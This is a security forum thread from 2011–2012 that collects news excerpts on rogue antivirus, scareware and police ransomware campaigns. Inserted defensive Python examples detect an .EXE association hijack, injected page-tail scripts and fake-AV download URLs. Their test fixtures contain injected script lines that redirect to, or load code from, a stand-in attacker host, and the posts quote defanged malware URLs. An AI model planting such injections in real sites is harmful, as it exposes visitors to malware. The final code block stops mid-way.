Rogue AV, AS, scareware, etc...


45 replies to this topic

#1 AplusWebMaster

  • SWI Friend
  • 9,266 posts

Posted 03 March 2011 - 04:57 AM

FYI...

Rogue AV different on each browser...
- http://research.zsca...-internals.html
March 2, 2011 - "... new type of Fake AV page that looks different on each browser. And it also uses internal elements of those browsers... The malicious executable InstallInternetDefender_722.exe is detected* by only 9.5% of AV!... The version displayed in Firefox... looks like the security warning Firefox shows for malicious and phishing sites... the Chrome version looks like a legitimate browser warning... For Safari, only the first popup box is tailored to the browser. The main page is the same as Internet Explorer..."
(Screenshots and more detail available at the URL above.)
* http://www.virustota...e1ce-1299087679
File name: InstallInternetDefender_722.exe
Submission date: 2011-03-02 17:41:19 (UTC)
Result: 4/42 (9.5%)
There is a more up-to-date report...
- http://www.virustota...e1ce-1299190654
File name: install_internetdefender.exe
Submission date: 2011-03-03 22:17:34 (UTC)
Result: 12/43 (27.9%)

:grrr:

Edited by AplusWebMaster, 04 March 2011 - 10:38 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#2 AplusWebMaster

Posted 03 March 2011 - 06:55 PM

FYI...

ChronoPay scareware...
- http://krebsonsecuri...reware-diaries/
March 3, 2011 - "If your Windows PC has been hijacked by fake anti-virus software or “scareware” anytime in the past few years, chances are good that the attack was made possible by ChronoPay, Russia’s largest processor of online payments... ChronoPay also specializes in processing the transactions of so-called “high-risk” industries, including online pharmacies, tobacco sales, porn and software sales. A business is generally classified as high-risk when there is a great potential for credit card chargebacks and a fair chance that it will shut down or vanish without warning... ChronoPay, lists more than 75 pages of credit card transactions that the company processed from Americans who paid anywhere from $50 to $150 to rid their computers of imaginary threats found by scareware from creativity-soft .com... As security firm F-Secure noted* at the time, victims of this scam were informed that an “antipiracy foundation scanner” had found illegal torrents from the victim’s system, and those who refused to pay $400 via a credit card transaction could face jail time and huge fines..."
* http://www.f-secure....s/00001931.html

- http://www.f-secure....s/00002112.html
March 4, 2011

:grrr:

Edited by AplusWebMaster, 04 March 2011 - 05:53 PM.



#3 AplusWebMaster

Posted 14 March 2011 - 05:12 AM

FYI...

Rogue AV links from tsunami in Japan...
- http://isc.sans.edu/...l?storyid=10543
Last Updated: 2011-03-14 08:21:18 UTC - "... people are still surprised how quickly bad guys catch up with events in the real world - this is especially true for the RogueAV/FakeAV groups which constantly poison search engines in order to lure people into installing their malware. We can also see even many AV vendors warning people to be careful when they search for this or that (currently, obviously the search query that generates most attention is related to the disaster in Japan). While it is good to constantly raise awareness and warn people about what’s happening, one important thing to know is that the RogueAV/FakeAV guys poison search engines and modify their scripts automatically. This means that they are constantly on top of current trends and events in the world – whatever happens, their scripts will make sure that they “contain” the latest data/information about it... With the disaster in Japan striking on Friday we saw another RogueAV/FakeAV group heavily poisoning the search engines – even Google which normally removes them quickly still contains hundreds of thousands of such pages. Since this campaign can be easily identified, here is... the current count... 1.7 million pages (!!!). Keep in mind that there are multiple pages listed here with different search terms (they modify search terms through a single parameter), but the number is still staggering. According to Google, in past 24 hours there have been 14,200 such pages added so it’s clear that the bad guys are very active... the RogueAV/FakeAV guys can create very realistic pages that can, unfortunately as we’ve all witnessed, successfully poison search engines."

:ph34r: :grrr: :ph34r:



#4 AplusWebMaster

Posted 19 April 2011 - 08:13 AM

FYI...

Rogue AV - Easter cards...
- http://sunbeltblog.b...e-rogue-av.html
April 19, 2011 - "Looks like we have more shenanigans involving rogue AV products and Easter... Elsewhere there are malicious emails* doing the rounds - the Easter scams are in full swing..."
* http://www.net-secur...ews.php?id=1698

(Screenshots available at both URLs above.)

:grrr: :ph34r:



#5 AplusWebMaster

Posted 12 May 2011 - 12:21 PM

FYI...

Google doodle leads to scareware...
- http://www.h-online....es-1242208.html
12 May 2011 - "... it is rare for a click on a prominently positioned Google doodle to take you to links for fake virus scans... If a user clicks on the doodle to find out what it means, Google launches a search for the term the doodle refers to... On Wednesday, Google celebrated the 117th birthday of dance icon Martha Graham. Clicking on the doodle displayed a list of preview images of the modern art dancer, some of which were links to a scareware site... At present, a search for Martha Graham on Google still displays those images. Once on the scareware site the user is then offered the SecurityScanner.exe file for download in order to solve the alleged virus problem; the file contains malware. Only 4 of the 42 scanners used by Virustotal flagged the file as being a threat at 11am on Wednesday. A test conducted by The H's associates at heise Security revealed that the scareware managed to infect a Windows 7 system with Microsoft Security Essentials 2 (MSE2) enabled. The malware disabled MSE2 and added itself to the security centre as "Win 7 Home Security 2011" – and labelled itself as disabled. Users are then asked to pay €60 to activate it.
The infected system could no longer be used in any meaningful way. Warnings constantly popped up whenever any web page was visited regardless of which browser was used. The program does not appear on the list of installed software and therefore cannot be uninstalled easily. In similar cases, scareware could, with a lot of effort, be manually removed, but this software changed so many settings in the system that reinstalling Windows was the safest solution."
___

- http://blog.stopbadw...wedding-present
2011.04.29 - "... we have no reason to believe the site’s legitimate owners intended for this URL to exist. Rather, an attacker appears to have exploited a weakness in the site’s security model and inserted a -redirect- for the URL... the payload from this attack can be extremely annoying and costly — it makes the PC all but unusable — this sort of attack is certainly not of the most sophisticated or technically dangerous variety. A user who does -not- download or run the Fake AV executable does not appear to suffer compromise..."
> http://www.virustota...884b-1304097780
File name: SecurityScanner.exe
Submission date: 2011-04-29 17:23:00 (UTC)
Result: 4/42 (9.5%)
There is a more up-to-date report ...
- http://www.virustota...884b-1305388325
File name: 7978e13ab11b027fb22b6cb4ec16dd3f
Submission date: 2011-05-14 15:52:05 (UTC)
Result: 32/43 (74.4%)

:grrr: :ph34r: :grrr:

Edited by AplusWebMaster, 22 May 2011 - 02:17 PM.



#6 AplusWebMaster

Posted 17 May 2011 - 07:55 AM

FYI...

Scareware fakes HD failures...
- http://www.symantec....defragger-sales
16 May 2011 - "... Hard disk failures are a fact of life... Trojan.FakeAV writers are aware of this, and the end of last year saw a move by some into the creation of fake hard disk scanners and defragmentation tools... Trojan.Fakefrag. What sets this apart from standard fake disk cleanup utilities is that the Trojan makes changes on the computer and displays messages that make it appear as though the hard disk is failing. Then it drops a member of the UltraDefragger family called Windows Recovery, which offers to repair these disk errors for a mere $79.50!...
• It fakes hardware failure messages...
• It moves all the files in the "All Users" folder to a temporary location and hides files in the "Current User" folder. This makes it look like you have lost all the files on your desktop.
• It stops you from changing your background image.
• It disables the Task Manager.
• It sets both the “HideIcons” and “Superhidden” registry entries to give the impression that more icons have been deleted.
... the failure messages look just like something Windows would display..."
(Screenshots, video, and more detail available at the Symantec URL above.)
___

New scareware - charted
- http://blogs.mcafee....OG_110513_2.jpg
May 13, 2011

:grrr: :!: :ph34r:

Edited by AplusWebMaster, 18 May 2011 - 09:43 AM.



#7 AplusWebMaster

Posted 18 May 2011 - 11:09 PM

FYI...

Fake AV bingo - 165 domains of bad
- http://isc.sans.org/...l?storyid=10894
Last Updated: 2011-05-19 00:06:54 UTC ...(Version: 2) - "Can you guess which domains the crooks behind the Fake Anti-Virus Scam are going to use next? Well, neither can we. But for several weeks now, they are hosting a lot of their bad stuff out of 91.213.29.66, geo-located in... Russia... all in all 165 domains of badness.
Several of these domains were "found" by our readers via the poisoned Google image searches* that we reported earlier this month, and also via malicious advertisements embedded in perfectly benign web pages...
Fake AV has made its appearance on Macs**, where naive automatic download-and-run default settings in browsers still are common, and where "MacDefender" and its expected numerous successors and variants are likely to become as "successful" for the bad guys as their Windows version has been for years..."
* http://isc.sans.edu/...l?storyid=10822
2011-05-04
** http://isc.sans.edu/...l?storyid=10813
2011-05-02

:grrr: :ph34r:



#8 AplusWebMaster

Posted 20 May 2011 - 08:48 AM

FYI...

Mac Fake AV...
- http://news.cnet.com...064394-245.html
May 19, 2011 - "Macintosh users are being targeted with malware that poses as an antivirus warning and tries to trick people into paying for software they don't need. This ruse isn't new. So-called rogue antivirus has been hitting Windows machines for years. But this is the first time this type of malware has been written to target the much smaller Mac market... Mac Defender, also known as Mac Security and Mac Protector, is a fake antivirus program that is designed to scare people into thinking that their computers are infected with malware..."

- http://blog.intego.c...fake-antivirus/

- http://download.cnet...0064445-12.html
May 19, 2011 - "... On any platform, rogue antivirus programs are resistant to standard program removal procedures. This means you can't just drag one to the trash..."
(More detail on removal procedures at the above URL.)
___

- http://www.h-online....te-1246693.html
20 May 2011 - "... Users of the Safari web browser should disable automatic file opening in Safari (Preferences -> General and uncheck "Open 'safe' files after downloading"). More importantly though, users should, when prompted for their user name and password, be asking themselves "what is requesting this information" and remembering that they are giving it privileges to modify their system..."

:grrr: :ph34r:

Edited by AplusWebMaster, 20 May 2011 - 12:21 PM.



#9 AplusWebMaster

Posted 25 May 2011 - 06:53 AM

FYI...

Apple advisory on "MacDefender" malware
- http://isc.sans.edu/...l?storyid=10918
Last Updated: 2011-05-25 00:05:17 UTC

- http://support.apple.com/kb/HT4650
May 24, 2011 - "... Products Affected:
Mac OS X 10.4, Mac OS X 10.6, Mac OS X 10.5..."

Safari "Force Quit"
- http://support.apple.com/kb/ht3411

:ph34r:



#10 AplusWebMaster

Posted 26 May 2011 - 05:53 AM

FYI...

MacDefender variant changes tactics...
- http://isc.sans.edu/...l?storyid=10927
Last Updated: 2011-05-26 08:11:01 UTC - "MacDefender... has upped the ante with a new version according to Intego* that does not need to ask the user's password any longer... it's not using an exploit to avoid asking the right to write in the /Applications directory, it simply installs the software and activates it for the current user only. Since most Macs are using only a single user that changes little for the malware. But it removes the pop-up for your password. Anybody in the admin group can write to the /Applications directory..."
* http://www.intego.co...nt-macguard.asp
May 25, 2011 - "... effective SEO poisoning has led many Mac users to this type of malware, and no administrator password is required to install this new variant..."

:grrr: :ph34r:



#11 AplusWebMaster

Posted 31 May 2011 - 11:44 AM

FYI...

Fake Firefox SCAM leads to scareware...
- http://nakedsecurity...d-to-scareware/
May 30, 2011 - "... latest scam? They detect your user-agent string from your web browser and display a fake Firefox security alert if you are using the Mozilla Firefox web browser... Internet Explorer users get the standard "My Computer" dialog that appears to do a system scan inside their browser window... We are likely to continue to see these criminals targeting each operating system, browser and any other details that can be gleaned from HTTP requests sent from our devices. If you click the "Start Protection" button you will download the latest, greatest fake anti-virus program..."
(Screenshots available at the Sophos URL above.)

:grrr:



#12 AplusWebMaster

Posted 06 June 2011 - 03:13 PM

FYI...

FakeRean - turns hard-core ...
- http://sunbeltblog.b...-hard-core.html
June 06, 2011 - "FakeRean was initially discovered by Microsoft* a couple of years ago. Like all rogue AV families, it displays fake scanning results to users in an effort to dupe them into coughing up cash in order to register the software and clean their systems supposedly. This family also alters the infected system's registry quite extensively and drops lots of component and shortcut files, among other things. What sets FakeRean apart from the usual rogues is its ability to hijack a file association for executable (.EXE) files, which allows it to reappear every time an application is run... page is found on SourceForge.net, a prominent repository of open-source software, as a profile page... get a free but malicious software to download and run on your systems once you click -any- of the buttons there. This software is a PDF exploit that, once installed, drops and also installs FakeRean. We detect the exploit as Exploit.PDF-JS.Gen... This SourceForge profile URL, and some 100+ other varying Web page URLs, is contained on imonline(dot)nl(slash)ukabefijac... All URLs are -redirect- via seoholding(dot)com... Be extra careful, if not steer clear altogether, when visiting online profiles hosted on -any- site that -looks- suspicious."
(Screenshots available at the sunbeltblog URL above.)
* http://www.microsoft...=Win32/FakeRean

:grrr: :ph34r:

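The FakeRean write-up above says the rogue hijacks the file association for .EXE files so it is re-launched every time a program runs. On Windows that association is the (Default) value of HKCR\exefile\shell\open\command, which on a clean system is exactly "%1" %*. The following is an added example, not code from the forum post, Sunbelt or Microsoft: it classifies that value, parses out any interposed launcher path, and (on Windows only) can read the live key. The sample values are constructed and the hijack path is a placeholder, not an indicator from any real sample.

```python
r"""Check whether the launch command for .EXE files has been hijacked.

Added example, not code from the forum post, Sunbelt or Microsoft. A rogue
that hijacks the executable file association rewrites the (Default) value of
HKCR\exefile\shell\open\command so that its own binary starts first and then
launches the program the user asked for. On a stock Windows install the value
is exactly  "%1" %*  so anything else deserves a look.
"""
import re
import sys

# Default launch command for executables on a clean Windows system.
EXPECTED_EXEFILE_COMMAND = '"%1" %*'

# Matches a leading quoted or bare program path placed in front of "%1".
LEADING_PROGRAM_RE = re.compile(r'^(?:"([^"]+)"|(\S+))\s+')


def classify_exefile_command(value: str) -> dict:
    """Classify one command string read from the exefile open-command key.

    Returns 'status' ('clean' or 'suspicious'), the interposed 'launcher'
    path if one could be parsed, and the normalized 'value'.
    """
    normalized = value.strip()
    if normalized == EXPECTED_EXEFILE_COMMAND:
        return {"status": "clean", "launcher": None, "value": normalized}
    m = LEADING_PROGRAM_RE.match(normalized)
    launcher = (m.group(1) or m.group(2)) if m else None
    return {"status": "suspicious", "launcher": launcher, "value": normalized}


def read_live_exefile_command():
    """Read the live value from the registry. Returns None off Windows."""
    if sys.platform != "win32":
        return None
    import winreg  # Windows-only standard-library module

    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT,
                        r"exefile\shell\open\command") as key:
        value, _ = winreg.QueryValueEx(key, "")
    return value


# Constructed sample values; the hijack path is a placeholder, not a real IoC.
SAMPLE_COMMANDS = {
    "stock": '"%1" %*',
    "hijacked": r'"C:\ProgramData\PLACEHOLDER\rogue.exe" "%1" %*',
}


def audit_samples() -> dict:
    """Classify every constructed sample; used by the demo run below."""
    return {name: classify_exefile_command(v)
            for name, v in SAMPLE_COMMANDS.items()}


if __name__ == "__main__":
    for name, verdict in audit_samples().items():
        print(f"{name:9s} {verdict['status']:10s} {verdict['value']}")
    live = read_live_exefile_command()
    if live is not None:
        print("live      ", classify_exefile_command(live))
```

HKCR is a merged view, and a per-user override under HKCU\Software\Classes\exefile takes precedence over the machine-wide key, so when triaging a live system check both locations, not just HKCR.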


#13 AplusWebMaster

Posted 21 June 2011 - 06:06 AM

FYI...

Malware campaign injects Java exploit code
- http://community.web...ploit-code.aspx
20 Jun 2011 - "... detected a Rogue AV campaign that directly attacks the user's system instead of first redirecting to a dedicated attack server. Attackers usually compromise web pages to drive traffic to web servers hosting exploit kits. In this injection though, we see exploit code directly planted into legitimate pages... attacks an Oracle Java vulnerability (CVE-2010-4452) by exploiting a design flaw in the Java class loader to execute an unsigned Java applet with local user rights. The exploit affects Java Runtime Environment versions 6 Update 23 and earlier. It was addressed by Oracle with Update 24 in February 2011. In internal tests, we could confirm that the malicious applet would load in all popular browsers with built-in Java support like IE, Firefox, and Opera... The payload in this case is the nowadays ubiquitous Rogue Antivirus. In case you haven't already done so, don't forget to update your Java version* as soon as possible."
(Screenshots available at the Websense URL above.)
* http://www.java.com/...nload/index.jsp

:grrr: :ph34r:



#14 AplusWebMaster

Posted 20 July 2011 - 01:24 AM

FYI...

Google finds a million scareware infections...
- http://krebsonsecuri...to-be-infected/
July 19, 2011 - "Google today began warning more than a million Internet users that their computers are infected with a malicious program that hijacks search results and tries to scare users into purchasing fake antivirus software... the malware apparently arrives on victim desktops as fake antivirus or “scareware” programs that use misleading warnings about security threats to trick people into purchasing worthless security software... The malware intercepts traffic destined for high profile domains like google.com, yahoo.com and bing.com, and routes it through intermediate hosts or “proxies” controlled by the attackers. The proxies are used to modify the search results that a victim sees for any given search term, and to redirect traffic to pay-per-click schemes that pay for traffic to specific Web sites. Fortunately, the traffic generated by the malware has a unique “signature” that Google is able to use to alert victims. Google is placing a prominent notification* at the top of victims’ Google search results; it includes links to resources to help remove the infection... the hard work will be in the cleanup: Search hijackers are notorious for blocking users from visiting antivirus Web sites or other popular sources of malware removal tools."
* http://krebsonsecuri.../07/googhij.png
___

- http://googleonlines...eople-from.html
Updated July 20, 2011

:grrr: :ph34r:

Edited by AplusWebMaster, 21 July 2011 - 05:05 AM.



#15 AplusWebMaster

Posted 25 July 2011 - 10:46 AM

FYI...

Fake video codecs - with scareware
- http://threatpost.co...careware-072511
July 25, 2011 - "... Most scareware programs rely on Web-based pop-ups that appear when a victim visits a site that has been compromised. The user sees a dialog box that typically looks a lot like the Windows security center interface informing him that his machine is full of scary sounding malware... The goal, of course, is to get the unwitting victim to click on the dialog box and install whatever rogue AV tool they're pushing and then get him to pony up for the license fee. Now, researchers at GFI Labs* have come across a new breed of rogue AV that takes a less direct route to the victim's wallet. This attack, which is related to the FakeVimes family of scareware that Google recently began warning users about, installs some files on users' machines, but doesn't immediately start demanding payment in return for fictitious security services. Instead, it waits for a victim to try to play a Web video..."
* http://sunbeltblog.b...rs-up-home.html
"... a sample of some of the files found on the infected machine:
c:\Documents and Settings\All Users\Application Data\7f0924\VD7f0_2326.exe
c:\Documents and Settings\All Users\Application Data\ip\e.exe
c:\Documents and Settings\All Users\Application Data\ip\FRed32.dll
c:\Documents and Settings\All Users\Application Data\ip\instr.ini
c:\Documents and Settings\All Users\Application Data\ip\SmartGeare.exe
c:\Documents and Settings\All Users\Application Data\ip\spoof.avi
c:\WINDOWS\system32\c_726535.nls ..."

:grrr: :ph34r:



#16 AplusWebMaster

Posted 30 January 2012 - 11:31 AM

FYI...

Rogue activity spikes ...
- https://blogs.techne...Redirected=true
29 Jan 2012 - "... Lately, we have seen a resurgence in rogue activity (one particularly obnoxious threat going by the name Security Defender – aka Win32/Defmid – has been making the rounds of late); rogue security programs attempt to trick users into paying for -fake- antivirus software... Think twice before handing over your credit card details to a third party you cannot verify – like one displaying pop-ups, or on the end of an unsolicited phone call."
(Screenshots available at the URL above.)

:( :ph34r:



#17 AplusWebMaster

Posted 02 March 2012 - 11:08 AM

FYI...

Rogue rash ...
- https://blogs.techne...Redirected=true
1 Mar 2012 - "Rogue:Win32/FakePAV reappeared about two weeks ago after a brief hiatus and since then we’ve been seeing variants with new names for themselves just about every day. The latest versions call themselves names like “Windows Threats Destroyer”, “Windows Firewall Constructor”, "Windows Attacks Preventor" and “Windows Basic Antivirus”... Each sample of FakePAV is distributed as a self-extracting RAR archive, which contains a second self-extracting RAR archive. This second, “inner” archive contains the rogue executable itself, but it is password-protected; simply trying to extract it without knowing the password doesn’t work... In the last few days they’ve started obfuscating these scripts, probably to make it harder for anti-malware scanners to detect them. Because RAR self-extractor scripts are stored as part of the archive comment, essentially anything that the self-extractor doesn’t recognize as an instruction is ignored, meaning pretty much any text can be added without changing the functionality... These kinds of tactics are aimed at making it difficult for anti-malware scanners to look inside the malware’s distribution package, and they highlight the need for real-time malware protection. For the malware to work, the malicious executable has to be written to disk at which point real-time protection can not only detect it but stop it from being executed..."
(Screenshots available at the URL above.)

:grrr: :ph34r:



#18 AplusWebMaster

Posted 05 March 2012 - 12:43 PM

FYI...

Mass injection wave of WordPress sites - Rogue AV ...
- http://community.web...ress-sites.aspx
5 Mar 2012 - "... Websense... has detected a new wave of mass-injections... The majority of targets are Web sites hosted by the WordPress content management system. At the time of writing, more than 200,000 Web pages have been compromised, amounting to close to 30,000 unique Web sites (hosts). The injection hijacks visitors to the compromised sites and redirects them to rogue AV sites that attempt to trick them into downloading and installing a Trojan onto their computer. The injected code is very short and is placed at the bottom of the page, just before </body> tag... After a three-level -redirection- chain, victims land on a fake AV site. In this example, the first chain is the ".rr.nu", and the landing site is the ".de.lv" top-level domain, but the landing site keeps changing. The rogue AV site appears to perform a scan on the computer and scares the user by displaying fake malware detections of various kinds of Trojans. The page looks like a Windows Explorer window with a "Windows Security Alert" dialogue box in it. The fake scanning process looks like a normal Windows application, however, it is only a pop-up window within the browser. The fake antivirus then prompts visitors to download and run their "antivirus tool" to remove the supposedly found Trojans. The executable is itself the Trojan... more than 85% of the compromised sites are in the United States, while visitors to these web sites are more geographically dispersed*... while the attack is specific to the US, everyone is at risk when visiting these compromised pages..."
* http://community.web..._5F00_GeoIP.png

> http://community.web...182.FakeAV3.png
___

- http://community.web...-protected.aspx
13 Mar 2012 - "... We checked several aspects of each of these compromised websites and concluded that most of them are served by Apache webserver and PHP environment*...
* http://community.web...tribution1s.png
... WordPress still serves the majority of the compromised websites; however, we did see a small amount of other CMS as well. We also noticed that an increasing number of Joomla sites** are also affected, with all other content managers making up a tinier slice...
** http://community.web...tribution2s.png
... having the latest version of WordPress does not make you immune to this threat...
> http://community.web...tribution3s.png
... some of the dominant attack vectors that websites using the latest WordPress version are likely to be exploited through:
• Weak passwords / stolen credentials
• Vulnerable third-party modules used in WordPress
• Security holes in the underlying server infrastructure, such as in the database server or the server side scripting engine (PHP in this case)..."

:grrr: :ph34r:

Edited by AplusWebMaster, 14 March 2012 - 10:01 AM.

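The Websense excerpt above gives site owners a concrete place to look: the injected snippet is short and sits at the very bottom of the page, immediately before the </body> tag, and its job is to send the visitor off to another host. The following is an added example, not code from the forum post or Websense: a small scanner a WordPress administrator could run over saved page sources. It isolates the last <script> before </body>, ignores it when other markup separates the two, and flags it when it either loads from a host other than the site's own or contains an inline location change. The sample pages and the attacker.invalid host are constructed; the real campaign's domains are not reproduced here.

```python
"""Flag a script tag injected immediately before </body>.

Added example, not code from the forum post or Websense. Sample pages are
constructed; `attacker.invalid` is a placeholder host, not an indicator.
"""
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
BODY_END_RE = re.compile(r"</body\s*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
# Inline primitives that move the browser somewhere else.
REDIRECT_MARKERS = ("location.href", "location.replace", "window.location", "document.location")


def tail_script(html: str):
    """Return (attrs, body, gap) for the last <script> before </body>, else None.

    gap is the number of non-whitespace characters between that script's
    closing tag and </body>; zero means the script is the final element.
    """
    body_end = BODY_END_RE.search(html)
    if body_end is None:
        return None
    scripts = list(SCRIPT_RE.finditer(html, 0, body_end.start()))
    if not scripts:
        return None
    last = scripts[-1]
    between = html[last.end():body_end.start()]
    return last.group(1), last.group(2), len(re.sub(r"\s+", "", between))


def assess_page(html: str, site_host: str) -> dict:
    """Classify the page-tail script; site_host is the site's own hostname."""
    found = tail_script(html)
    if found is None:
        return {"verdict": "clean", "reason": "no script before </body>"}
    attrs, body, gap = found
    if gap > 0:
        return {"verdict": "clean", "reason": "last script is not adjacent to </body>"}
    src = SRC_RE.search(attrs)
    if src:
        host = (urlparse(src.group(1)).hostname or "").lower()
        if host and host != site_host and not host.endswith("." + site_host):
            return {"verdict": "suspicious", "reason": f"tail script loaded from {host}"}
        return {"verdict": "clean", "reason": "tail script is same-origin"}
    if any(marker in body for marker in REDIRECT_MARKERS):
        return {"verdict": "suspicious", "reason": "inline redirect at page tail"}
    return {"verdict": "review", "reason": "inline script at page tail; inspect manually"}


def scan_pages(pages: dict, site_host: str) -> list:
    """Return the paths whose tail script is suspicious, in input order."""
    return [path for path, html in pages.items()
            if assess_page(html, site_host)["verdict"] == "suspicious"]


# Constructed sample pages for a site assumed to live at example.com.
CLEAN_PAGE = """<html><body><h1>Post</h1>
<script src="/wp-includes/js/jquery.js"></script>
<p>footer</p>
</body></html>"""

INLINE_INJECTED_PAGE = """<html><body><h1>Post</h1>
<script src="/wp-includes/js/jquery.js"></script>
<p>footer</p>
<script>window.location = "http://attacker.invalid/landing";</script></body></html>"""

EXTERNAL_INJECTED_PAGE = """<html><body><h1>Post</h1>
<p>footer</p>
<script src="http://attacker.invalid/x.js"></script>
</body></html>"""

SAMPLE_SITE = {
    "/index.html": CLEAN_PAGE,
    "/2012/03/post-a.html": INLINE_INJECTED_PAGE,
    "/2012/03/post-b.html": EXTERNAL_INJECTED_PAGE,
}

if __name__ == "__main__":
    for path, html in SAMPLE_SITE.items():
        print(path, assess_page(html, "example.com"))
    print("flagged:", scan_pages(SAMPLE_SITE, "example.com"))
```

The check is deliberately narrow (last script, adjacent to </body>, off-site or self-redirecting) so that a theme's own footer scripts do not drown the result in noise; a page that gets the "review" verdict still warrants a look, since an obfuscated snippet may not contain any of the plain markers.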


#19 AplusWebMaster

Posted 15 March 2012 - 08:04 AM

FYI...

Rogue AV tweaked every 12 to 24 hours to avoid detection
- http://www.gfi.com/b...-threat-tactic/
Mar 13, 2012 - "... the trend that criminals behind bogus AV software are now distributing via spam that has links to sites where users can be further infected with the Blackhole exploit..."
- http://www.gfi.com/p...s-and-consumers
Mar 09, 2012 - "... Rogue AV programs are continually tweaked in an attempt to avoid detection, with newer variants of these malicious applications propagating every 12 to 24 hours... Trojans once again dominated the list, taking -half- of the top 10 spots..."
Top 10 Threat Detections for February
- http://www.gfi.com/c...tions-21084.png

:grrr: :ph34r:



#20 AplusWebMaster

Posted 24 March 2012 - 04:41 PM

FYI...

Flash-Based Fake AV - drive-by exploits and SPAM
- http://www.symantec....-risk-minimizer
23 Mar 2012 - "... relatively new fake antivirus application called Windows Risk Minimizer. The -fake- antivirus software was promoted through spam sent from a popular webmail service. This is slightly unusual as normally fake antivirus infections arrive through drive-by exploits. Spam messages promoting the fake antivirus software contained links to compromised domains, which then -redirected- users to the fake antivirus site. We witnessed over 300 compromised domains being used in just a few hours. When opening the fake antivirus site, the user is greeted with a JavaScript alert message, whereby the fake antivirus (referred to here as "Windows Secure Kit 2012") claims that your machine is infected... The page uses Flash making it look more convincing with realistic icons, progress bars, and dialog boxes. Unsurprisingly, the fake antivirus detects plenty of viruses. Decompressing the Flash file and analyzing it shows a huge list of files contained within it. The Flash movie then simply picks some of these at random and claims they are infected (with equally random virus names). Once the scan is complete, a Windows Security Alert dialog appears with a summary of the scan. This dialog can be moved around the screen and (for reasons unknown) the different infections can be selected and unselected... To avoid getting infected with fake antivirus software, ensure you keep your operating system, Web browser, and antivirus software up-to-date with all security patches..."
(Screenshots available at the URL above.)


Edited by AplusWebMaster, 24 March 2012 - 04:42 PM.



#21 AplusWebMaster


Posted 13 April 2012 - 08:16 AM

FYI...

New Fake AV scareware attempts to extort Torrent users
- http://www.theregist...onware_hyrbrid/
13 April 2012 - "Security researchers have discovered a strain of fake anti-virus software that tries to intimidate supposed file-sharers* into paying for worthless software. SFX Fake AV, first detected by freebie antivirus scanner firm Malwarebytes, blends the features of scareware with those more associated with ransomware Trojans. The malware stops any legitimate anti-virus package from running on compromised PCs, something common to other scareware packages. But this particular strain of malware goes further than this by stopping Process Explorer (procexp.exe) and preventing browsers from loading – tactics designed to force marks to complete the ‘input credit card details’ screen and hand over money for the scamware... the malware also performs a fake scan that classifies Windows Registry Editor as a porn tool. Bruce Harrison, VP Research at Malwarebytes, said: "SFX Fake AV is morphing at a relatively fast rate, so it is something that signature-based vendors will have to watch out for as there will be an increasing number of variants in the wild. Also, the use of Dropbox as a delivery mechanism is something that the industry is going to have to take into account and protect against, as it is an emerging trend."
* http://regmedia.co.u...t_scareware.jpg



#22 AplusWebMaster


Posted 09 May 2012 - 12:20 PM

FYI...

Ransomware police trojan - now targets USA and Canada ...
- http://blog.trendmic...usa-and-canada/
May 9, 2012 - "The Police Trojan* has been targeting European users for about a year... the latest incarnations of this obnoxious malware have started targeting the United States and Canada. In the latest batch of C&C servers we have analyzed, not only has the list of countries increased but also their targets are now more specific. For instance, UKash vouchers are not available in the U.S., so the U.S. fake police notification that -spoofs- the Computer Crime & Intellectual Property Section of the U.S. Department of Justice only mentions PaySafeCard as the accepted payment method. The criminals also took the time to add plenty of logos of local supermarkets and chain stores where the cash vouchers are available...
> http://blog.trendmic..._screenshot.jpg
... the same Eastern European criminal gangs who were behind the fake antivirus boom are now turning to the Police Trojan strategy. We believe this is a malware landscape change and not a single gang attacking in a novel way. We also found C&C consoles that suggest a high level of development and possible reselling of the server back-end software used to manage these attacks..."
* http://blog.trendmic...-police-trojan/
"... plagued by so called Police Trojans that lock their computer completely until they pay a fine of 100 euros..."



#23 AplusWebMaster


Posted 31 May 2012 - 05:57 AM

FYI...

More extortion thru Ransomware
- http://www.ic3.gov/m...012/120530.aspx
May 30, 2012 - "... new Citadel malware platform used to deliver ransomware, named Reveton*. The ransomware lures the victim to a drive-by download website, at which time the ransomware is installed on the user's computer. Once installed, the computer freezes and a screen is displayed warning the user they have violated United States Federal Law. The message further declares the user's IP address was identified by the Computer Crime & Intellectual Property Section as visiting child pornography and other illegal content. To unlock their computer the user is instructed to pay a $100 fine to the US Department of Justice, using prepaid money card services. The geographic location of the user's IP address determines what payment services are offered. In addition to the ransomware, the Citadel malware continues to operate on the compromised computer and can be used to commit online banking and credit card fraud. Below is a screenshot of the warning:
> http://www.ic3.gov/images/120530.png
... This is an attempt to extort money with the additional possibility of the victim’s computer being used to participate in online bank fraud. If you have received this or something similar do -not- follow payment instructions..."

Reveton removal instructions:
* https://www.f-secure...2_reveton.shtml



#24 AplusWebMaster


Posted 19 June 2012 - 12:55 PM

FYI...

Fake AV malware campaign - 2012-06-19
- https://isc.sans.edu...l?storyid=13501
Last Updated: 2012-06-19 10:26:16 UTC - "... 'vulnerabilityqueerprocessbrittleness . in' is currently one of 600+ domains that link to a quite prevalent "Fake Anti-virus" malware campaign. Currently, the domains associated with this scam all point to web servers hosted in the 204.152.214.x address range, but of course the threat keeps "moving around" as usual... The current set of threats involves frequently changing malware EXEs (or EXEs inside of ZIPs) with low coverage on virustotal. The download URLs usually follow the pattern of http ://bad-domain. in/16 character random hex string/setup.exe or /setup.zip .
Example: http ://fail-safetytestingcontrol. in/fc1a9d5408b7e17d/setup.exe ..."

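The ISC diary quoted above gives two durable indicators for this campaign: the URL shape (a 16-character hex directory followed by setup.exe or setup.zip) and the 204.152.214.x hosting range. Below is an added example, not part of the diary or of this post, that turns those indicators into a scoring check over a handful of proxy-log lines. The "epoch client dst method url" log layout, the client addresses and every URL other than the two domains the diary itself names are constructed for the example; the .in TLD is used only as a weak third signal.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Indicators lifted from the ISC diary: path shape and hosting range.
FAKEAV_PATH = re.compile(r"^/[0-9a-f]{16}/setup\.(exe|zip)$")
FAKEAV_NET = ipaddress.ip_network("204.152.214.0/24")
FAKEAV_TLD = ".in"   # weak signal on its own; never alert on it alone

# Constructed sample proxy log ("epoch client dst method url"); the two
# .in domains are the ones the diary names, everything else is made up.
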